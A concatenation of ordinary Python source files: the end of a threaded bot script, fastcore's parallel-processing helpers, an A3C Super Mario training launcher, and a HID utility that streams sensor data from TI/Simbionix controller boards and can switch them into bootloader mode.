current_time = str(datetime.utcnow())[:19]
print("Warning:", current_time, error)
my_exception = format_exc()
my_date = str(datetime.now())[:19] + "\n\n"
with open("error_log.txt", "a", encoding="utf-8") as error_log:
error_log.write(my_date)
error_log.write(my_exception)
error_log.write("\n\n---------------\n")
# Wait for some time before checking for new private messages
sleep(self.message_wait)
def main(self):
"""Main loop of the program"""
# Create threads for the listeners
submissions_listener = Thread(target=self.check_submissions)
messages_listener = Thread(target=self.private_messages)
# Set the threads to 'daemoninc'
# (daemon threads do not prevent their parent program from exiting)
submissions_listener.daemon = True
messages_listener.daemon = True
# Begin the child threads
submissions_listener.start()
messages_listener.start()
# Catch a keyboard interrupt, so the threads can terminate and the program exit
signal(SIGINT, self.clean_exit)
while True:
submissions_listener.join(1)
messages_listener.join(1)
"""NOTE
In Python, there isn't any actual 'clean' way to terminate a thread.
By default, a KeyboardInterrupt is caught by an arbitrary thread,
while others remain running.
Using the signal() function forces the main thread to catch the interrupt.
Then the bot set the 'self.running' flag to False, which makes the its child
threads to exit their loop.
Finally, the whole program exits.
"""
def clean_exit(self, *args):
"""Close the program."""
self.running = False
raise SystemExit
if __name__ == "__main__":
try:
bot = ChickenBot()
bot.main()
except (SystemExit, KeyboardInterrupt):
print(f"\nBot stopped running. ({bot.reply_counter} replies in total, {bot.reply_counter_session} in this session)")
|
parallel.py
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/03a_parallel.ipynb (unless otherwise specified).
__all__ = ['threaded', 'startthread', 'set_num_threads', 'ThreadPoolExecutor', 'ProcessPoolExecutor', 'parallel',
'run_procs', 'parallel_gen']
# Cell
from .imports import *
from .foundation import *
from .basics import *
from .xtras import *
from functools import wraps
# from contextlib import contextmanager,ExitStack
from multiprocessing import Process, Queue
import concurrent.futures,time
from multiprocessing import Manager
from threading import Thread
# Cell
def threaded(f):
"Run `f` in a thread, and returns the thread"
@wraps(f)
def _f(*args, **kwargs):
res = Thread(target=f, args=args, kwargs=kwargs)
res.start()
return res
return _f
# Cell
def startthread(f):
"Like `threaded`, but start thread immediately"
threaded(f)()
# Cell
def set_num_threads(nt):
"Get numpy (and others) to use `nt` threads"
try: import mkl; mkl.set_num_threads(nt)
except: pass
try: import torch; torch.set_num_threads(nt)
except: pass
os.environ['IPC_ENABLE']='1'
for o in ['OPENBLAS_NUM_THREADS','NUMEXPR_NUM_THREADS','OMP_NUM_THREADS','MKL_NUM_THREADS']:
os.environ[o] = str(nt)
# Cell
def _call(lock, pause, n, g, item):
l = False
if pause:
try:
l = lock.acquire(timeout=pause*(n+2))
time.sleep(pause)
finally:
if l: lock.release()
return g(item)
# Cell
class ThreadPoolExecutor(concurrent.futures.ThreadPoolExecutor):
"Same as Python's ThreadPoolExecutor, except can pass `max_workers==0` for serial execution"
def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
if max_workers is None: max_workers=defaults.cpus
store_attr()
self.not_parallel = max_workers==0
if self.not_parallel: max_workers=1
super().__init__(max_workers, **kwargs)
def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
self.lock = Manager().Lock()
g = partial(f, *args, **kwargs)
if self.not_parallel: return map(g, items)
_g = partial(_call, self.lock, self.pause, self.max_workers, g)
try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
except Exception as e: self.on_exc(e)
# Cell
class ProcessPoolExecutor(concurrent.futures.ProcessPoolExecutor):
"Same as Python's ProcessPoolExecutor, except can pass `max_workers==0` for serial execution"
def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
if max_workers is None: max_workers=defaults.cpus
store_attr()
self.not_parallel = max_workers==0
if self.not_parallel: max_workers=1
super().__init__(max_workers, **kwargs)
def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
self.lock = Manager().Lock()
g = partial(f, *args, **kwargs)
if self.not_parallel: return map(g, items)
_g = partial(_call, self.lock, self.pause, self.max_workers, g)
try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
except Exception as e: self.on_exc(e)
# Cell
try: from fastprogress import progress_bar
except: progress_bar = None
# Cell
def parallel(f, items, *args, n_workers=defaults.cpus, total=None, progress=None, pause=0,
threadpool=False, timeout=None, chunksize=1, **kwargs):
"Applies `func` in parallel to `items`, using `n_workers`"
pool = ThreadPoolExecutor if threadpool else ProcessPoolExecutor
with pool(n_workers, pause=pause) as ex:
r = ex.map(f,items, *args, timeout=timeout, chunksize=chunksize, **kwargs)
if progress and progress_bar:
if total is None: total = len(items)
r = progress_bar(r, total=total, leave=False)
return L(r)
# Cell
def run_procs(f, f_done, args):
"Call `f` for each item in `args` in parallel, yielding `f_done`"
processes = L(args).map(Process, args=arg0, target=f)
for o in processes: o.start()
yield from f_done()
processes.map(Self.join())
# Cell
def _f_pg(obj, queue, batch, start_idx):
for i,b in enumerate(obj(batch)): queue.put((start_idx+i,b))
def _done_pg(queue, items): return (queue.get() for _ in items)
# Cell
def parallel_gen(cls, items, n_workers=defaults.cpus, **kwargs):
"Instantiate `cls` in `n_workers` procs & call each on a subset of `items` in parallel."
if n_workers==0:
yield from enumerate(list(cls(**kwargs)(items)))
return
batches = L(chunked(items, n_chunks=n_workers))
idx = L(itertools.accumulate(0 + batches.map(len)))
queue = Queue()
if progress_bar: items = progress_bar(items, leave=False)
f=partial(_f_pg, cls(**kwargs), queue)
done=partial(_done_pg, queue, items)
yield from run_procs(f, done, L(batches,idx).zip())
|
main.py
|
import os
os.environ['OMP_NUM_THREADS'] = '1'
import argparse
import torch
from src.env import create_train_env
from src.model import ActorCritic
from src.optimizer import GlobalAdam
from src.process import local_train, local_test
import torch.multiprocessing as _mp
import shutil
parser = argparse.ArgumentParser(
"""Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for Super Mario Bros""")
parser.add_argument("--world", type=int, default=1)
parser.add_argument("--stage", type=int, default=1)
parser.add_argument("--action_type", type=str, default="complex")
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
parser.add_argument("--num_local_steps", type=int, default=50)
parser.add_argument("--num_global_steps", type=int, default=5e6)
parser.add_argument("--num_processes", type=int, default=6)
parser.add_argument("--save_interval", type=int, default=500, help="Number of steps between savings")
parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros")
parser.add_argument("--saved_path", type=str, default="trained_models")
parser.add_argument("--load_from_previous_stage", type=bool, default=False,
help="Load weight from previous trained stage")
parser.add_argument("--use_gpu", type=bool, default=True)
opt = parser.parse_args()
if __name__ == "__main__":
torch.manual_seed(123)
if os.path.isdir(opt.log_path):
shutil.rmtree(opt.log_path)
os.makedirs(opt.log_path)
if not os.path.isdir(opt.saved_path):
os.makedirs(opt.saved_path)
mp = _mp.get_context("spawn")
env, num_states, num_actions = create_train_env(opt.world, opt.stage, opt.action_type)
global_model = ActorCritic(num_states, num_actions)
if opt.use_gpu:
global_model.cuda()
global_model.share_memory()
if opt.load_from_previous_stage:
if opt.stage == 1:
previous_world = opt.world - 1
previous_stage = 4
else:
previous_world = opt.world
previous_stage = opt.stage - 1
file_ = "{}/a3c_super_mario_bros_{}_{}".format(opt.saved_path, previous_world, previous_stage)
if os.path.isfile(file_):
global_model.load_state_dict(torch.load(file_))
optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
processes = []
for index in range(opt.num_processes):
if index == 0:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
else:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
process.start()
processes.append(process)
process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
process.start()
processes.append(process)
for process in processes:
process.join()
|
bsl.py
|
#!/usr/bin/python3
# C:\Work\Python\HID_Util\src\HID_recorder.py
from binascii import hexlify
import sys
import argparse
import threading
from time import perf_counter as timer
import include_dll_path
import hid
# import os
# BOARD_TYPE_MAIN = 0,
# BOARD_TYPE_JOYSTICKS = 1,
# BOARD_TYPE_TOOLS_MASTER = 2,
# BOARD_TYPE_STATION = 3,
# BOARD_TYPE_SUITE2PRIPH = 4,
# BOARD_TYPE_TOOLS_SLAVE = 5,
# BOARD_TYPE_GBU = 6,
# BOARD_TYPE_LAP = 7
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x1005 # Simbionix MSP430 Controller
PRODUCT_ID_CTAG = 0x1005 # Simbionix MSP430 Controller
# USB\VID_2047&PID_0302&REV_0200
VENDOR_ID = 0x2047 # Texas Instruments
PRODUCT_ID = 0x0302 # Joystick.
PRODUCT_ID_JOYSTICK = 0x0302 # Joystick.
PRODUCT_ID_ROUTER = 0x0301 # Router
PRODUCT_ID_STATION = 0x0304
PRODUCT_ID_LAP_NEW_CAMERA = 0x2005
# 2021_01_24
# USB\VID_24B3&PID_2005&REV_0200
# 0x24B3 = 9395
# 0x2005 = 8197
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA.
PRODUCT_ID_types = {
0x0302: "BOARD_TYPE: Joystick/Universal",
0x0301: "BOARD_TYPE: Router/Main",
0x0304: "BOARD_TYPE: STATION",
0x0303: "BOARD_TYPE: TOOLS_MASTER",
0x0305: "BOARD_TYPE: SUITE2PRIPH",
0x0306: "BOARD_TYPE: TOOLS_SLAVE",
0x0307: "BOARD_TYPE: GBU",
0x0308: "BOARD_TYPE: LAP camera",
0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h)
0x1965: "yosi"
}
FILE1_PATH = "log\hid_log.csv"
# if not os.path.exists('log'):
# os.makedirs('log')
# file1 = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w")
# file1 = open(FILE1_PATH,"w")
# file1 = open("log\hid_log.csv","w")
hid_util_fault = 0
print_every = 0
READ_SIZE = 64 # The size of the packet
READ_TIMEOUT = 2 # 2ms
WRITE_DATA = bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
DEFAULT_WRITE_DATA = WRITE_DATA
WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command:
# 3f 04 82 00 00
WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command for station 0x303:
WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# Get Board Type command:
# 01h 00h 00h 01h
WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#.........................................................##........................................
WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# 'A' - keep Alive + fast BLE update (every 20 msec)
WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# moderate BLE update rate every 50 mSec by 'M' command
WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# set_BSL_mode
# WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#0xAA Run BSL
WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds
PRINT_TIME = 1.0 # Print every 1 second
# PRINT_TIME = 0.5 # Print every 0.5 second
#PRINT_TIME = 2 # Print every 2 second
START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes)
# ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,]
ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2))
print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST)
# ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22]
LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2))
COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes)
CMOS_INDEX = 2 + 2 # maybe + 4???
# 0 1 2 3 4 5 6 7 8 9 1011
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
INSERTION_INDEX = 2 + 8
TORQUE_INDEX = 2 + 4
HID_STREAM_CHANNEL1_STYLE = "HIDStreamChannel1"
HID_STREAM_CHANNEL2_STYLE = "HIDStreamChannel2"
INNER_HANDLE_CHANNEL1_STYLE = "InnerHandleChannel1"
INNER_HANDLE_CHANNEL2_STYLE = "InnerHandleChannel2"
CLICKER_STYLE = "Clicker"
SLEEPTIMER_STYLE = "sleepTimer"
BATTERY_LEVEL_STYLE = "batteryLevel"
MOTOR_CURRENT_STYLE = "motorCurrent"
style_names = [
HID_STREAM_CHANNEL1_STYLE,
HID_STREAM_CHANNEL2_STYLE,
INNER_HANDLE_CHANNEL1_STYLE,
INNER_HANDLE_CHANNEL2_STYLE,
CLICKER_STYLE,
SLEEPTIMER_STYLE,
BATTERY_LEVEL_STYLE,
MOTOR_CURRENT_STYLE
]
# global variables
progressbar_styles = list()
progressbars = list()
inner_clicker = list()
red_handle = list()
reset_check = list()
counter_entry = list()
clicker_counter_entry = list()
fault_entry = list()
special_cmd = 0
ignore_red_handle_button = None
ignore_red_handle_checkbutton = None
ignore_red_handle_state = False
root = None
def update_checkbox(checkbox, bool_value):
if (bool_value):
checkbox.select()
else:
checkbox.deselect()
def streaming_button_CallBack():
global special_cmd
global ignore_red_handle_state
special_cmd = 'I'
ignore_red_handle_state = True
def board_type_button_callback():
global special_cmd
special_cmd = 'S'
def alive_button_CallBack():
global special_cmd
special_cmd = 'A'
def moderate_button_CallBack():
global special_cmd
special_cmd = 'M'
def BSL_mode_button_CallBack():
global special_cmd
special_cmd = 'B'
def gui_loop(device):
do_print = True
print_time = 0.0
time = timer()
handle_time = timer()
write_time_capture = timer()
skip_write = 0
prev_counter = 0
send_stream_request_command_once = 1
# cnt = None
# prev_cnt = None
# value = None
global special_cmd
global WRITE_DATA
# global print_flag
while True:
# Reset the counter
if (do_print):
print_time = timer()
# Write to the device
# if send_stream_request_command_once == 1:
# send_stream_request_command_once = 0
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
# print("enforce streaming of data with command 0x82"
# if device is attached enforce streaming of data.
# device.write(WRITE_DATA_CMD_START)
if special_cmd == 'I':
if PRODUCT_ID == PRODUCT_ID_STATION:
WRITE_DATA = WRITE_DATA_CMD_START_0x304
else:
WRITE_DATA = WRITE_DATA_CMD_START
device.write(WRITE_DATA)
print("special_cmd Start")
special_cmd = 0
# elif special_cmd == 'S':
# WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE
# device.write(WRITE_DATA)
# print("special_cmd CMD_GET_BOARD_TYPE")
# # print_flag = 1
# special_cmd = 0
# elif special_cmd == 'A':
# WRITE_DATA = WRITE_DATA_CMD_A
# print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)")
# special_cmd = 0
# elif special_cmd == 'M':
# WRITE_DATA = WRITE_DATA_CMD_M
# print("special_cmd M -> moderate BLE update rate every 50 mSec")
# special_cmd = 0
elif special_cmd == 'B':
WRITE_DATA = WRITE_DATA_CMD_B
device.write(WRITE_DATA)
print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI")
special_cmd = 0
# else:
# WRITE_DATA = DEFAULT_WRITE_DATA
# # device.write(WRITE_DATA)
if WRITE_DATA == WRITE_DATA_CMD_B:
break
cycle_time = timer() - time
# print("cycle timer: %.10f" % cycle_time)
# If not enough time has passed, sleep for SLEEP_AMOUNT seconds
sleep_time = SLEEP_AMOUNT - (cycle_time)
# if (timer() - time) < SLEEP_AMOUNT:
# if value:
# prev_cnt = cnt
# cnt = value[COUNTER_INDEX]
# if prev_cnt and cnt < prev_cnt:
# print("Invalid counter")
# sleep(SLEEP_AMOUNT)
# Measure the time
time = timer()
# print(" ")
# Read the packet from the device
value = device.read(READ_SIZE, timeout=READ_TIMEOUT)
# Update the GUI
if len(value) >= READ_SIZE:
# save into file:
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST]
channel_0 = analog[0]
channel_1 = analog[1]
channel_2 = analog[2]
channel_3 = analog[3]
channel_4 = analog[4]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
count_dif = counter - prev_counter
# global file1
#if count_dif > 1 :
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ]
#else:
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ]
L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ]
# file1.writelines(L)
# handler(value, do_print=do_print)
# print("Received data: %s" % hexlify(value))
Handler_Called = (timer() - handle_time)
if Handler_Called > 0.002 :
# if Handler_Called > 0.02 :
#print("handler called: %.6f" % Handler_Called)
global print_every
print_every = print_every + 1
if print_every >= 500:
print_every = 0
print("time:", time, end="")
print(" Received data: %s" % hexlify(value))
# print("time: %.6f" % time)
handle_time = timer()
prev_counter = counter
# Update the do_print flag
do_print = (timer() - print_time) >= PRINT_TIME
def handler(value, do_print=False):
if do_print:
print("Received data: %s" % hexlify(value))
return # do without gui
# if print_flag:
# print("command response: %s" % hexlify(value))
# print_flag = 0
# tool_size from CMOS: bytes 5..6
# 3f260000370b
global hid_util_fault
hid_util_fault = (int(value[START_INDEX+1]) & 0xF )
digital = (int(value[START_INDEX + 1]) << 8) + int(value[START_INDEX + 0])
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in ANALOG_INDEX_LIST]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
tool_size = (int(value[CMOS_INDEX + 1]) << 8) + int(value[CMOS_INDEX])
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
# 0674 fc41
# -62847372 = FC41 0674
# torque from Avago: bytes 6..9
torque = (int(value[TORQUE_INDEX + 2]) << 24) + (int(value[TORQUE_INDEX+3]) <<16) + (int(value[TORQUE_INDEX]) <<8) + int(value[TORQUE_INDEX+1])
insertion = (int(value[INSERTION_INDEX + 2]) << 24) + (int(value[INSERTION_INDEX+3]) <<16) + (int(value[INSERTION_INDEX]) <<8) + int(value[INSERTION_INDEX+1])
if torque > 2**31:
torque = torque - 2**32
if do_print:
print("Received data: %s" % hexlify(value))
# print("tool_size : %d" % tool_size)
# print("insertion : %d" % insertion , end="")
# print(" torque : %d" % torque)
clicker_counter = (int(value[COUNTER_INDEX+2 + 1]) << 8) + int(value[COUNTER_INDEX+2])
sleepTimer = (int(value[COUNTER_INDEX+4 + 1]) << 8) + int(value[COUNTER_INDEX+4])
encoder1 = analog[3]
encoder2 = analog[0]
encoder3 = analog[1]
encoder4 = analog[2]
MotorCur = analog[4]
clicker_analog = analog[5]
# ClickerRec = analog[6]
# batteryLevel = analog[6]
# ClickerRec is actually connected to Pin of the VREF+ that is on that input P5.0
batteryLevel = analog[7]
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# global file1
L = [ str(clicker_analog), "," ,"\n" ]
# file1.writelines(L)
bool_clicker = bool((digital >> 2) & 0x0001)
bool_reset = bool((digital >> 4) & 0x0001)
bool_red_handle = bool((digital >> 7) & 0x0001)
bool_ignore_red_handle = ignore_red_handle_state
if PRODUCT_ID != PRODUCT_ID_STATION:
int_hid_stream_channel1 = analog[1]
int_inner_handle_channel1 = analog[0]
else:
int_hid_stream_channel1 = insertion
int_inner_handle_channel1 = torque
int_hid_stream_channel2 = tool_size
int_inner_handle_channel2 = analog[3]
int_clicker = clicker_analog
int_sleepTimer = sleepTimer
int_batteryLevel = batteryLevel
int_MotorCur = MotorCur
int_counter = counter
int_hid_util_fault = hid_util_fault
int_clicker_counter = clicker_counter
int_hid_stream_insertion = insertion
if PRODUCT_ID != PRODUCT_ID_STATION:
precentage_hid_stream_channel1 = int((int_hid_stream_channel1 / 4096) * 100)
precentage_inner_handle_channel1 = int((int_inner_handle_channel1 / 4096) * 100)
else:
precentage_hid_stream_channel1 = abs(int((int_hid_stream_channel1 / 1000) * 100))
precentage_inner_handle_channel1 = abs(int((int_inner_handle_channel1 / 1000) * 100))
precentage_hid_stream_channel2 = int((int_hid_stream_channel2 / 4096) * 100)
precentage_inner_handle_channel2 = int((int_inner_handle_channel2 / 4096) * 100)
precentage_clicker = int((int_clicker / 4096) * 100)
# precentage_sleepTimer = int((int_sleepTimer / 600) * 100)
precentage_sleepTimer = int(int_sleepTimer )
precentage_batteryLevel = int((int_batteryLevel / 4096) * 100)
precentage_MotorCur = int((int_MotorCur / 4096) * 100)
progressbar_style_hid_stream_channel1 = progressbar_styles[0]
progressbar_style_hid_stream_channel2 = progressbar_styles[1]
progressbar_style_inner_handle_channel1 = progressbar_styles[2]
progressbar_style_inner_handle_channel2 = progressbar_styles[3]
progressbar_style_clicker = progressbar_styles[4]
progressbar_style_sleepTimer = progressbar_styles[5]
progressbar_style_batteryLevel = progressbar_styles[6]
progressbar_style_MotorCur = progressbar_styles[7]
progressbar_hid_stream_channel1 = progressbars[0]
progressbar_hid_insertion = progressbars[0] #can I duplicate it?
progressbar_hid_stream_channel2 = progressbars[1]
progressbar_inner_handle_channel1 = progressbars[2]
progressbar_inner_handle_channel2 = progressbars[3]
progressbar_clicker = progressbars[4]
progressbar_sleepTimer = progressbars[5]
progressbar_batteryLevel = progressbars[6]
progressbar_MotorCur = progressbars[7]
checkbox_inner_clicker = inner_clicker
checkbox_red_handle = red_handle
checkbox_reset_check = reset_check
checkbox_ignore_red_handle = ignore_red_handle_checkbutton
entry_counter = counter_entry
entry_clicker_counter = clicker_counter_entry
entry_fault = fault_entry
progressbar_style_hid_stream_channel1.configure(
HID_STREAM_CHANNEL1_STYLE,
text=("%d" % int_hid_stream_channel1)
)
progressbar_style_hid_stream_channel2.configure(
HID_STREAM_CHANNEL2_STYLE,
text=("%d" % int_hid_stream_channel2)
)
progressbar_style_inner_handle_channel1.configure(
INNER_HANDLE_CHANNEL1_STYLE,
text=("%d" % int_inner_handle_channel1)
)
progressbar_style_inner_handle_channel2.configure(
INNER_HANDLE_CHANNEL2_STYLE,
text=("%d" % int_inner_handle_channel2)
)
progressbar_style_clicker.configure(
CLICKER_STYLE,
text=("%d" % int_clicker)
)
progressbar_style_sleepTimer.configure(
SLEEPTIMER_STYLE,
text=("%d" % sleepTimer)
)
progressbar_style_batteryLevel.configure(
BATTERY_LEVEL_STYLE,
text=("%d" % batteryLevel)
)
progressbar_style_MotorCur.configure(
MOTOR_CURRENT_STYLE,
text=("%d" % MotorCur)
)
# if ( batteryLevel <= 2310 ):
if ( batteryLevel <= 2288 ): # about 2.8 volt
progressbar_style_batteryLevel.configure(BATTERY_LEVEL_STYLE,foreground="white", background="#d92929")
else:
progressbar_style_batteryLevel.configure(BATTERY_LEVEL_STYLE, foreground="white", background="blue")
progressbar_hid_stream_channel1["value"] = precentage_hid_stream_channel1
progressbar_hid_stream_channel2["value"] = precentage_hid_stream_channel2
progressbar_inner_handle_channel1["value"] = precentage_inner_handle_channel1
progressbar_inner_handle_channel2["value"] = precentage_inner_handle_channel2
progressbar_clicker["value"] = precentage_clicker
progressbar_sleepTimer["value"] = precentage_sleepTimer
progressbar_sleepTimer["maximum"] = 600
progressbar_batteryLevel["value"] = precentage_batteryLevel
progressbar_MotorCur["value"] = precentage_MotorCur
update_checkbox(checkbox_inner_clicker, bool_clicker)
update_checkbox(checkbox_red_handle, bool_red_handle)
update_checkbox(checkbox_reset_check, bool_reset)
update_checkbox(checkbox_ignore_red_handle, bool_ignore_red_handle)
entry_counter.delete(0, tk.END)
entry_counter.insert(tk.END, "%d" % int_counter)
entry_clicker_counter.delete(0, tk.END)
entry_clicker_counter.insert(tk.END, "%d" % int_clicker_counter)
entry_fault.delete(0, tk.END)
entry_fault.insert(tk.END, "%d" % int_hid_util_fault)
root.update()
PROGRESS_BAR_LEN = 300
LONG_PROGRESS_BAR_LEN = 590
def my_channel_row(frame, row, label, style):
ttk.Label(frame,text=label).grid(row=row,sticky=tk.W)
row += 1
if PRODUCT_ID != PRODUCT_ID_STATION:
# Inner Handle
ttk.Label(frame,text="Channel 1").grid(row=row,column=0)
ttk.Label(frame,text="Channel 2").grid(row=row,column=1)
else:
ttk.Label(frame,text="Torque").grid(row=row,column=0)
ttk.Label(frame,text="Channel 2").grid(row=row,column=1)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("%sChannel1"%style))
progressbars.append(w)
w.grid(row=row,column=0)
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("%sChannel2"%style))
progressbars.append(w)
w.grid(row=row,column=1)
return row + 1
def my_seperator(frame, row):
ttk.Separator(
frame,
orient=tk.HORIZONTAL
).grid(
pady=10,
row=row,
columnspan=3,
sticky=(tk.W + tk.E)
)
return row + 1
def my_widgets(frame):
# Add style for labeled progress bar
for name in style_names:
style = ttk.Style(
frame
)
progressbar_styles.append(style)
style.layout(
name,
[
(
"%s.trough" % name,
{
"children":
[
(
"%s.pbar" % name,
{"side": "left", "sticky": "ns"}
),
(
"%s.label" % name,
{"sticky": ""}
)
],
"sticky": "nswe"
}
)
]
)
if name == SLEEPTIMER_STYLE:
# style.configure(name, foreground="white", background="blue")
style.configure(name, foreground="white", background="#d9d9d9")
elif name == BATTERY_LEVEL_STYLE:
# style.configure(name, foreground="white", background="blue")
style.configure(name, foreground="white", background="#d92929")
else:
# style.configure(name, background="lime")
style.configure(name, background="#06B025")
# print(style)
row = 0
# Outer Handle
ttk.Label(frame,text="HID Streaming Values").grid(row=row,sticky=tk.W)
row += 1
text_name = "Channel 1"
if PRODUCT_ID == PRODUCT_ID_STATION:
text_name = "Insertion"
ttk.Label(frame,text=text_name).grid(row=row,column=0)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("HIDStreamChannel1"))
progressbars.append(w)
w.grid(row=row,column=0)
row -= 1 # go line back for text header
text_name = "Channel 2"
if PRODUCT_ID == PRODUCT_ID_STATION:
text_name = "Tool Size"
ttk.Label(frame,text=text_name).grid(row=row,column=1)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("HIDStreamChannel2"))
progressbars.append(w)
w.grid(row=row,column=1)
row += 1
# Seperator
row = my_seperator(frame, row)
if PRODUCT_ID != PRODUCT_ID_STATION:
# Inner Handle
row = my_channel_row(frame=frame,row=row,label="InnerHandle",style="InnerHandle")
else:
row = my_channel_row(frame=frame,row=row,label="PRODUCT_ID_STATION",style="InnerHandle")
# Seperator
row = my_seperator(frame, row)
# Clicker labels
ttk.Label(frame,text="InnerClicker").grid(row=row,column=0,sticky=tk.W)
ttk.Label(frame,text="Clicker").grid(row=row,column=1)
ttk.Label(frame,text="ClickerCounter").grid(row=row,column=2)
row += 1
# Clicker data
w = tk.Checkbutton(frame,state=tk.DISABLED)
global inner_clicker
inner_clicker = w
w.grid(row=row,column=0)
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style="Clicker")
progressbars.append(w)
w.grid(row=row,column=1)
# yg: adding clicker counter display
w = ttk.Entry(frame,width=20,)
global clicker_counter_entry
clicker_counter_entry = w
w.grid(
#padx=10,#pady=5,
row=row,
column=2,#sticky=tk.W,
)
row += 1
# Seperator
row = my_seperator(frame, row)
# Red handle and reset button labels
ttk.Label(frame,text="RedHandle").grid(row=row,column=0,sticky=tk.W)
ttk.Label(frame,text="ResetButton").grid(row=row,column=1)
ttk.Label(frame,text="IgnoreRedHandlefault").grid(row=row,column=2)
row += 1
# Red handle and reset button data
w = tk.Checkbutton(frame,state=tk.DISABLED)
global red_handle
red_handle = w
w.grid(row=row,column=0)
w = tk.Checkbutton(frame,state=tk.DISABLED)
global reset_check
reset_check = w
w.grid(row=row,column=1)
red_handle_ignore = tk.Button(frame,text ="Start streaming",command = streaming_button_CallBack)
red_handle_ignore.grid(row=row,column=3)
# checkbox for the ignore red handle
